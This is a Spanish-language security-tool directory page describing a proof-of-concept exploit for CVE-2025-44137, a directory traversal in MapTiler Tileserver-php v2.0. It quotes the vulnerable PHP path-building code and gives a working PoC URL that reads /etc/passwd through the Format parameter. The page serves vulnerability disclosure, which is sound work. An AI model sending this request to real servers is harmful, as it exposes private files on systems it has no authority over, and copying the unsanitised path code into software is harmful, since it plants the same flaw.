Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-44137 — Prueba de concepto de exploit para CVE-2025-44137: directory traversal no autenticado en MapTiler Tileserver-php v2.0, permitiendo lectura arbitraria de archivos mediante parámetros GET diseñados. | Kitploit
Herramientas/GitHubGitHub/mheranco/cve-2025-44137
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubmheranco/cve-2025-44137

CVE-2025-44137

Prueba de concepto de exploit para CVE-2025-44137: directory traversal no autenticado en MapTiler Tileserver-php v2.0, permitiendo lectura arbitraria de archivos mediante parámetros GET diseñados.

Ver Repositorio
2hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-44137

Lectura de archivos no autenticada en MapTiler Tileserver-php v2.0.

Descripción

MapTiler Tileserver-php v2.0 es vulnerable a Directory Traversal. La función renderTile dentro de tileserver.php es responsable de entregar tiles que se almacenan como archivos en el servidor mediante una solicitud web. Al crear la ruta a un archivo se permite el uso de '../', que puede ser usado para leer cualquier archivo en el servidor web. Los parámetros GET afectados son "TileMatrix", "TileRow", "TileCol" y "Format".

https://github.com/maptiler/tileserver-php/blob/d0fdeaec69688dc500b652a23669d724d7d53df2/tileserver.php#L381-L398

root@kitploit:~
      $name = './' . $tileset . '/' . $z . '/' . $x . '/' . $y;
      $mime = 'image/';
      if($ext != null){
        $name .= '.' . $ext;
      }
      if ($fp = @fopen($name, 'rb')) {
        if($ext != null){
          $mime .= $ext;
        }else{
          //detect image type from file
          $mimetypes = ['gif', 'jpeg', 'png'];
          $mime .= $mimetypes[exif_imagetype($name) - 1];
        }
        header('Access-Control-Allow-Origin: *');
        header('Content-Type: ' . $mime);
        header('Content-Length: ' . filesize($name));
        fpassthru($fp);
        die;

PoC

http://localhost/tileserver.php/x/1/1/1?Format=/../../../../../../../../../../../../../../etc/passwd&Request=x&layer=.

Captura de pantalla 1 Captura de pantalla 2

Créditos

Martin Herancourt

Descargar herramienta